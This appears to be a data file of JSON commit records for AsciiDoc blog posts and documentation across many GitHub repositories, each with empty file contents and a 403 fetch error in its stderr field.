{"commit":"af82dccc53e2a0b24e69857170b911afb27313c7","subject":"Update 2015-12-10-docker-network-multihost.adoc","message":"Update 2015-12-10-docker-network-multihost.adoc","repos":"euprogramador\/euprogramador.github.io,euprogramador\/euprogramador.github.io,euprogramador\/euprogramador.github.io","old_file":"_posts\/2015-12-10-docker-network-multihost.adoc","new_file":"_posts\/2015-12-10-docker-network-multihost.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/euprogramador\/euprogramador.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b0f4849597f21b9f464b0aca56d9f0b08d09f00d","subject":"Update 2016-03-31-Mensajes-ocultos-parte-1.adoc","message":"Update 2016-03-31-Mensajes-ocultos-parte-1.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-03-31-Mensajes-ocultos-parte-1.adoc","new_file":"_posts\/2016-03-31-Mensajes-ocultos-parte-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e0040f1d92909c2d5475a8608cf50e7cb1ca9843","subject":"Update 2015-07-14-Turn-your-Raspberry-Pi-2-into-a-Hotspot.adoc","message":"Update 
2015-07-14-Turn-your-Raspberry-Pi-2-into-a-Hotspot.adoc","repos":"KurtStam\/kurtstam.github.io,KurtStam\/kurtstam.github.io,KurtStam\/kurtstam.github.io","old_file":"_posts\/2015-07-14-Turn-your-Raspberry-Pi-2-into-a-Hotspot.adoc","new_file":"_posts\/2015-07-14-Turn-your-Raspberry-Pi-2-into-a-Hotspot.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/KurtStam\/kurtstam.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c0f4376fa736ad6752c2b50eba0fd084d4b6344a","subject":"Update 2016-07-20-Adding-Dynamic-Filters-to-a-Leaflet-Map.adoc","message":"Update 2016-07-20-Adding-Dynamic-Filters-to-a-Leaflet-Map.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-20-Adding-Dynamic-Filters-to-a-Leaflet-Map.adoc","new_file":"_posts\/2016-07-20-Adding-Dynamic-Filters-to-a-Leaflet-Map.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f413304eb98b5d60036440d140cfdfaa9822d166","subject":"Update 2016-07-20-Adding-Dynamic-Filters-to-a-Leaflet-Map.adoc","message":"Update 2016-07-20-Adding-Dynamic-Filters-to-a-Leaflet-Map.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-20-Adding-Dynamic-Filters-to-a-Leaflet-Map.adoc","new_file":"_posts\/2016-07-20-Adding-Dynamic-Filters-to-a-Leaflet-Map.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ec932e822d39041cb281d202021b42ce49c3e523","subject":"Update 2017-02-09-test1.adoc","message":"Update 2017-02-09-test1.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2017-02-09-test1.adoc","new_file":"_posts\/2017-02-09-test1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9571e2c870e44d1e8ee10f6297a138d1df9fe79b","subject":"Delete the file at '_posts\/2017-05-05-Sonata-Admin-Custom-Export-Format.adoc'","message":"Delete the file at '_posts\/2017-05-05-Sonata-Admin-Custom-Export-Format.adoc'","repos":"kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io","old_file":"_posts\/2017-05-05-Sonata-Admin-Custom-Export-Format.adoc","new_file":"_posts\/2017-05-05-Sonata-Admin-Custom-Export-Format.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kunicmarko20\/kunicmarko20.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f7145cee67de42364fcaaa3ad5c9924867981f9b","subject":"Update 2016-03-28-improve-your-java-environment-with-docker.adoc","message":"Update 
2016-03-28-improve-your-java-environment-with-docker.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2016-03-28-improve-your-java-environment-with-docker.adoc","new_file":"_posts\/2016-03-28-improve-your-java-environment-with-docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"540a6de905f1d5971f90431edb5e3d646b4b8f48","subject":"Update 2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","message":"Update 2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","new_file":"_posts\/2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"090ebcdc118d7f278cdfe88627f0f7176ccc2706","subject":"y2b create post Would You Put This On Your Phone?","message":"y2b create post Would You Put This On Your Phone?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-05-26-Would-You-Put-This-On-Your-Phone.adoc","new_file":"_posts\/2017-05-26-Would-You-Put-This-On-Your-Phone.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cb9c6d2718d0247d2a1d9798e8886aaeee1c9bb3","subject":"Update 2016-02-16-Rename-CocoaPods-Xcode-Project.adoc","message":"Update 2016-02-16-Rename-CocoaPods-Xcode-Project.adoc","repos":"dakeshi\/dakeshi.github.io,dakeshi\/dakeshi.github.io,dakeshi\/dakeshi.github.io,dakeshi\/dakeshi.github.io","old_file":"_posts\/2016-02-16-Rename-CocoaPods-Xcode-Project.adoc","new_file":"_posts\/2016-02-16-Rename-CocoaPods-Xcode-Project.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dakeshi\/dakeshi.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"85070492972bff5644e1b8b8d089ce10c4455dd1","subject":"Update 2016-02-29-Xen-Foro-Forum-Projekt-von-mir.adoc","message":"Update 2016-02-29-Xen-Foro-Forum-Projekt-von-mir.adoc","repos":"AlexL777\/hubpressblog,AlexL777\/hubpressblog,AlexL777\/hubpressblog,AlexL777\/hubpressblog","old_file":"_posts\/2016-02-29-Xen-Foro-Forum-Projekt-von-mir.adoc","new_file":"_posts\/2016-02-29-Xen-Foro-Forum-Projekt-von-mir.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/AlexL777\/hubpressblog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ef2e94cb1f454eaa6981fe5b1b67311915534bc3","subject":"job: #11748 Draft of training plan for model compiler consultation.","message":"job: #11748 Draft of training plan for model compiler 
consultation.\n","repos":"xtuml\/training,xtuml\/training","old_file":"doc-training\/notes\/11748_mctrain\/11748_mctrain_ant.adoc","new_file":"doc-training\/notes\/11748_mctrain\/11748_mctrain_ant.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xtuml\/training.git\/': The requested URL returned error: 403\n","license":"cc0-1.0","lang":"AsciiDoc"} {"commit":"759f906a34583fd60264a42e0e090b8de515a261","subject":"Update 2014-10-23-I-am.adoc","message":"Update 2014-10-23-I-am.adoc","repos":"jarcane\/jarcane.github.io,jarcane\/jarcane.github.io,jarcane\/jarcane.github.io,jarcane\/jarcane.github.io","old_file":"_posts\/2014-10-23-I-am.adoc","new_file":"_posts\/2014-10-23-I-am.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jarcane\/jarcane.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2f5ad230c160062ea0383ad9a749cdfc6784ad19","subject":"Update 2015-08-18-Test.adoc","message":"Update 2015-08-18-Test.adoc","repos":"jiashengc\/blog,jiashengc\/blog,jiashengc\/blog","old_file":"_posts\/2015-08-18-Test.adoc","new_file":"_posts\/2015-08-18-Test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jiashengc\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"54b1becb5abb8ba40a11963d188bac997107e588","subject":"Update 2016-02-19-test.adoc","message":"Update 2016-02-19-test.adoc","repos":"hinaloe\/hubpress,hinaloe\/hubpress,hinaloe\/hubpress,hinaloe\/hubpress","old_file":"_posts\/2016-02-19-test.adoc","new_file":"_posts\/2016-02-19-test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hinaloe\/hubpress.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d9efd08bfdc7fd18616a740b52d62721422d2fc1","subject":"SEC-2577: Add missing whitespace in reference","message":"SEC-2577: Add missing whitespace in 
reference\n","repos":"SanjayUser\/SpringSecurityPro,thomasdarimont\/spring-security,jgrandja\/spring-security,likaiwalkman\/spring-security,olezhuravlev\/spring-security,caiwenshu\/spring-security,eddumelendez\/spring-security,ollie314\/spring-security,olezhuravlev\/spring-security,Peter32\/spring-security,adairtaosy\/spring-security,zhaoqin102\/spring-security,mounb\/spring-security,Xcorpio\/spring-security,mdeinum\/spring-security,hippostar\/spring-security,izeye\/spring-security,ractive\/spring-security,hippostar\/spring-security,xingguang2013\/spring-security,MatthiasWinzeler\/spring-security,liuguohua\/spring-security,Peter32\/spring-security,mounb\/spring-security,mdeinum\/spring-security,rwinch\/spring-security,mounb\/spring-security,diegofernandes\/spring-security,xingguang2013\/spring-security,spring-projects\/spring-security,jmnarloch\/spring-security,cyratech\/spring-security,follow99\/spring-security,zhaoqin102\/spring-security,rwinch\/spring-security,ajdinhedzic\/spring-security,mdeinum\/spring-security,panchenko\/spring-security,jmnarloch\/spring-security,kazuki43zoo\/spring-security,Xcorpio\/spring-security,zshift\/spring-security,MatthiasWinzeler\/spring-security,spring-projects\/spring-security,izeye\/spring-security,mparaz\/spring-security,olezhuravlev\/spring-security,wkorando\/spring-security,raindev\/spring-security,panchenko\/spring-security,panchenko\/spring-security,wkorando\/spring-security,pkdevbox\/spring-security,follow99\/spring-security,driftman\/spring-security,Krasnyanskiy\/spring-security,follow99\/spring-security,rwinch\/spring-security,mdeinum\/spring-security,SanjayUser\/SpringSecurityPro,xingguang2013\/spring-security,djechelon\/spring-security,djechelon\/spring-security,raindev\/spring-security,eddumelendez\/spring-security,pkdevbox\/spring-security,jgrandja\/spring-security,zshift\/spring-security,chinazhaoht\/spring-security,izeye\/spring-security,mparaz\/spring-security,jgrandja\/spring-security,izeye\/spring-security,wkorando\/spring-security,likaiwalkman\/spring-security,vitorgv\/spring-security,mparaz\/spring-security,thomasdarimont\/spring-security,likaiwalkman\/spring-security,liuguohua\/spring-security,spring-projects\/spring-security,adairtaosy\/spring-security,djechelon\/spring-security,yinhe402\/spring-security,cyratech\/spring-security,spring-projects\/spring-security,ollie314\/spring-security,thomasdarimont\/spring-security,jmnarloch\/spring-security,Xcorpio\/spring-security,ractive\/spring-security,zgscwjm\/spring-security,pwheel\/spring-security,ollie314\/spring-security,likaiwalkman\/spring-security,diegofernandes\/spring-security,mrkingybc\/spring-security,MatthiasWinzeler\/spring-security,chinazhaoht\/spring-security,zgscwjm\/spring-security,fhanik\/spring-security,pkdevbox\/spring-security,hippostar\/spring-security,wkorando\/spring-security,MatthiasWinzeler\/spring-security,yinhe402\/spring-security,eddumelendez\/spring-security,ollie314\/spring-security,jgrandja\/spring-security,forestqqqq\/spring-security,vitorgv\/spring-security,pkdevbox\/spring-security,olezhuravlev\/spring-security,Xcorpio\/spring-security,rwinch\/spring-security,mrkingybc\/spring-security,mrkingybc\/spring-security,fhanik\/spring-security,hippostar\/spring-security,diegofernandes\/spring-security,kazuki43zoo\/spring-security,diegofernandes\/spring-security,rwinch\/spring-security,Krasnyanskiy\/spring-security,kazuki43zoo\/spring-security,fhanik\/spring-security,eddumelendez\/spring-security,forestqqqq\/spring-security,cyratech\/spring-security,caiwenshu\/sprin
g-security,caiwenshu\/spring-security,SanjayUser\/SpringSecurityPro,eddumelendez\/spring-security,pwheel\/spring-security,pwheel\/spring-security,spring-projects\/spring-security,spring-projects\/spring-security,Krasnyanskiy\/spring-security,thomasdarimont\/spring-security,zgscwjm\/spring-security,fhanik\/spring-security,kazuki43zoo\/spring-security,zhaoqin102\/spring-security,raindev\/spring-security,jgrandja\/spring-security,jmnarloch\/spring-security,spring-projects\/spring-security,yinhe402\/spring-security,vitorgv\/spring-security,adairtaosy\/spring-security,rwinch\/spring-security,ajdinhedzic\/spring-security,mounb\/spring-security,driftman\/spring-security,liuguohua\/spring-security,olezhuravlev\/spring-security,pwheel\/spring-security,mrkingybc\/spring-security,xingguang2013\/spring-security,djechelon\/spring-security,chinazhaoht\/spring-security,adairtaosy\/spring-security,ajdinhedzic\/spring-security,forestqqqq\/spring-security,zgscwjm\/spring-security,thomasdarimont\/spring-security,jgrandja\/spring-security,pwheel\/spring-security,Peter32\/spring-security,fhanik\/spring-security,Peter32\/spring-security,raindev\/spring-security,panchenko\/spring-security,Krasnyanskiy\/spring-security,yinhe402\/spring-security,mparaz\/spring-security,zshift\/spring-security,chinazhaoht\/spring-security,driftman\/spring-security,zhaoqin102\/spring-security,forestqqqq\/spring-security,vitorgv\/spring-security,ajdinhedzic\/spring-security,ractive\/spring-security,kazuki43zoo\/spring-security,driftman\/spring-security,djechelon\/spring-security,liuguohua\/spring-security,SanjayUser\/SpringSecurityPro,zshift\/spring-security,fhanik\/spring-security,SanjayUser\/SpringSecurityPro,cyratech\/spring-security,ractive\/spring-security,follow99\/spring-security,caiwenshu\/spring-security","old_file":"docs\/manual\/src\/asciidoc\/index.adoc","new_file":"docs\/manual\/src\/asciidoc\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jmnarloch\/spring-security.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"04b1650f96b188eccac3689cd4675c5bb4946911","subject":"First draft of Clojure Remote event page","message":"First draft of Clojure Remote event page\n","repos":"clojure\/clojure-site","old_file":"content\/events\/2017\/clojureremote.adoc","new_file":"content\/events\/2017\/clojureremote.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"446d9decb5f4dd91f6c9a9be3b7cfd0b2c2ba07f","subject":"y2b create post Xbox 360 Chatpad vs. PS3 Wireless Keypad","message":"y2b create post Xbox 360 Chatpad vs. 
PS3 Wireless Keypad","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-10-03-Xbox-360-Chatpad-vs-PS3-Wireless-Keypad.adoc","new_file":"_posts\/2011-10-03-Xbox-360-Chatpad-vs-PS3-Wireless-Keypad.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c5114ec10f3da8c9c9358f16955e5ebd325bc743","subject":"y2b create post Metal Gear Solid HD Collection Unboxing","message":"y2b create post Metal Gear Solid HD Collection Unboxing","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-12-18-Metal-Gear-Solid-HD-Collection-Unboxing.adoc","new_file":"_posts\/2011-12-18-Metal-Gear-Solid-HD-Collection-Unboxing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5545a03c0237dd8f1261b7052befa269333b6767","subject":"Update 2012-09-30-Migration-du-blog-vers-Octopress-Github.adoc","message":"Update 2012-09-30-Migration-du-blog-vers-Octopress-Github.adoc","repos":"jcsirot\/hubpress.io,jcsirot\/hubpress.io,jcsirot\/hubpress.io,jcsirot\/hubpress.io","old_file":"_posts\/2012-09-30-Migration-du-blog-vers-Octopress-Github.adoc","new_file":"_posts\/2012-09-30-Migration-du-blog-vers-Octopress-Github.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jcsirot\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"01397bb34beb5999548c37ca28186834719916aa","subject":"y2b create post BEST CYBER MONDAY DEALS 2012 + LIVE SHOW","message":"y2b create post BEST CYBER MONDAY DEALS 2012 + LIVE SHOW","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-11-26-BEST-CYBER-MONDAY-DEALS-2012--LIVE-SHOW.adoc","new_file":"_posts\/2012-11-26-BEST-CYBER-MONDAY-DEALS-2012--LIVE-SHOW.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"85c6145a9ed2f5eee03aa55190339cefd59e4d6a","subject":"This commit adds ClojureBridge Krak\u00f3w, Poland chapter","message":"This commit adds ClojureBridge Krak\u00f3w, Poland chapter\n","repos":"clojure\/clojure-site","old_file":"content\/events\/2016\/clojurebridge_krakow.adoc","new_file":"content\/events\/2016\/clojurebridge_krakow.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"057ea8312f914d6fb97cded96c50efbe3e54cddb","subject":"Adding Testing documentation","message":"Adding Testing documentation\n","repos":"beavyHQ\/beavy,beavyHQ\/beavy,beavyHQ\/beavy,beavyHQ\/beavy","old_file":"docs\/Testing.adoc","new_file":"docs\/Testing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: 
unable to access 'https:\/\/github.com\/beavyHQ\/beavy.git\/': The requested URL returned error: 403\n","license":"mpl-2.0","lang":"AsciiDoc"} {"commit":"4b18bb1032fa176157b15be7620b51f12b319c2d","subject":"add beginning of guide","message":"add beginning of guide\n","repos":"clojure\/clojurescript-site","old_file":"content\/guides\/code-splitting.adoc","new_file":"content\/guides\/code-splitting.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojurescript-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"c4092542f1cd9772e0e285c0b5bcba51ce5961bc","subject":"add deref","message":"add deref\n","repos":"clojure\/clojure-site","old_file":"content\/news\/2022\/05\/06\/deref.adoc","new_file":"content\/news\/2022\/05\/06\/deref.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"b562561d1d72d4f22ebda77195c469b3cf1c174d","subject":"add deref","message":"add deref\n","repos":"clojure\/clojure-site","old_file":"content\/news\/2022\/11\/23\/deref.adoc","new_file":"content\/news\/2022\/11\/23\/deref.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"715f422de7eecbbcd1e1e07e9ad0c8877308bd04","subject":"y2b create post Need For Speed The Run Limited Edition Unboxing","message":"y2b create post Need For Speed The Run Limited Edition Unboxing","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-12-31-Need-For-Speed-The-Run-Limited-Edition-Unboxing.adoc","new_file":"_posts\/2011-12-31-Need-For-Speed-The-Run-Limited-Edition-Unboxing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e75300d467fc0457ac99fe915c59c10f5fd17f26","subject":"`usage.txt` is not displayed","message":"`usage.txt` is not displayed\n\nTry to fix it.\n","repos":"dulanov\/emerald-rs","old_file":"docs\/cli.adoc","new_file":"docs\/cli.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dulanov\/emerald-rs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9597b8865233067be95e1b9fca22507de4bab64b","subject":"Update 2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","message":"Update 2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","new_file":"_posts\/2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9fb0c7d396fb7b948d788aca9d92d20aaab9ae6e","subject":"Update 
2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","message":"Update 2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","new_file":"_posts\/2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6e0b2c877edac407091020dbfd107adba016d24f","subject":"Update 2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","message":"Update 2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","new_file":"_posts\/2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"97ebc49d80c77922066ee2ccc2bfdfb626a59640","subject":"ISIS-2013: adds documentation","message":"ISIS-2013: adds documentation\n","repos":"apache\/isis,apache\/isis,apache\/isis,apache\/isis,apache\/isis,apache\/isis","old_file":"adocs\/documentation\/src\/main\/asciidoc\/guides\/rgsvc\/_rgsvc_persistence-layer-api_H2ManagerMenu.adoc","new_file":"adocs\/documentation\/src\/main\/asciidoc\/guides\/rgsvc\/_rgsvc_persistence-layer-api_H2ManagerMenu.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/apache\/isis.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"bbc46eb021321d9e91489957189c80320af246fb","subject":"Adding release notes for release of coverage revapi_basic_features revapi_reporter_file_base revapi_ant_task revapi_java revapi_reporter_json revapi_reporter_text revapi_standalone revapi_maven_plugin","message":"Adding release notes for release of coverage revapi_basic_features revapi_reporter_file_base revapi_ant_task revapi_java revapi_reporter_json revapi_reporter_text revapi_standalone revapi_maven_plugin\n","repos":"revapi\/revapi,revapi\/revapi,revapi\/revapi","old_file":"revapi-site\/src\/site\/modules\/news\/pages\/news\/20210604-releases.adoc","new_file":"revapi-site\/src\/site\/modules\/news\/pages\/news\/20210604-releases.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/revapi\/revapi.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"570e5379b32aedbfa40d3b94fc831136fa9d5f20","subject":"Update 2017-05-27-Difference-with-Artificial-Intelligence-and-Machine-Leaning-and-Deep-Leadning.adoc","message":"Update 
2017-05-27-Difference-with-Artificial-Intelligence-and-Machine-Leaning-and-Deep-Leadning.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-05-27-Difference-with-Artificial-Intelligence-and-Machine-Leaning-and-Deep-Leadning.adoc","new_file":"_posts\/2017-05-27-Difference-with-Artificial-Intelligence-and-Machine-Leaning-and-Deep-Leadning.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"087022d80373c78268bbb7b76d41611ca1bfd0b7","subject":"Update 2016-10-04-Installing-Squid.adoc","message":"Update 2016-10-04-Installing-Squid.adoc","repos":"trycrmr\/hubpress.io,trycrmr\/hubpress.io,trycrmr\/hubpress.io,trycrmr\/hubpress.io","old_file":"_posts\/2016-10-04-Installing-Squid.adoc","new_file":"_posts\/2016-10-04-Installing-Squid.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/trycrmr\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"aeacdc27538c6f66a5e22aff0c33764ea9878f37","subject":"Update 2017-03-30-Week-1-Mapa-e-UI.adoc","message":"Update 2017-03-30-Week-1-Mapa-e-UI.adoc","repos":"mahrocks\/mahrocks.github.io,mahrocks\/mahrocks.github.io,mahrocks\/mahrocks.github.io,mahrocks\/mahrocks.github.io","old_file":"_posts\/2017-03-30-Week-1-Mapa-e-UI.adoc","new_file":"_posts\/2017-03-30-Week-1-Mapa-e-UI.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mahrocks\/mahrocks.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b7c471944e2fd2f23aebea147c05e4079e83bf6d","subject":"Update 2017-09-06-Passwordless-SSH.adoc","message":"Update 2017-09-06-Passwordless-SSH.adoc","repos":"scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io","old_file":"_posts\/2017-09-06-Passwordless-SSH.adoc","new_file":"_posts\/2017-09-06-Passwordless-SSH.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scottellis64\/scottellis64.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9fa888ca16831ac389091ca6868d610cf7060391","subject":"Update 2017-07-24-full-text-search-by-mongodb-and-elasticsearch.adoc","message":"Update 2017-07-24-full-text-search-by-mongodb-and-elasticsearch.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-24-full-text-search-by-mongodb-and-elasticsearch.adoc","new_file":"_posts\/2017-07-24-full-text-search-by-mongodb-and-elasticsearch.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to 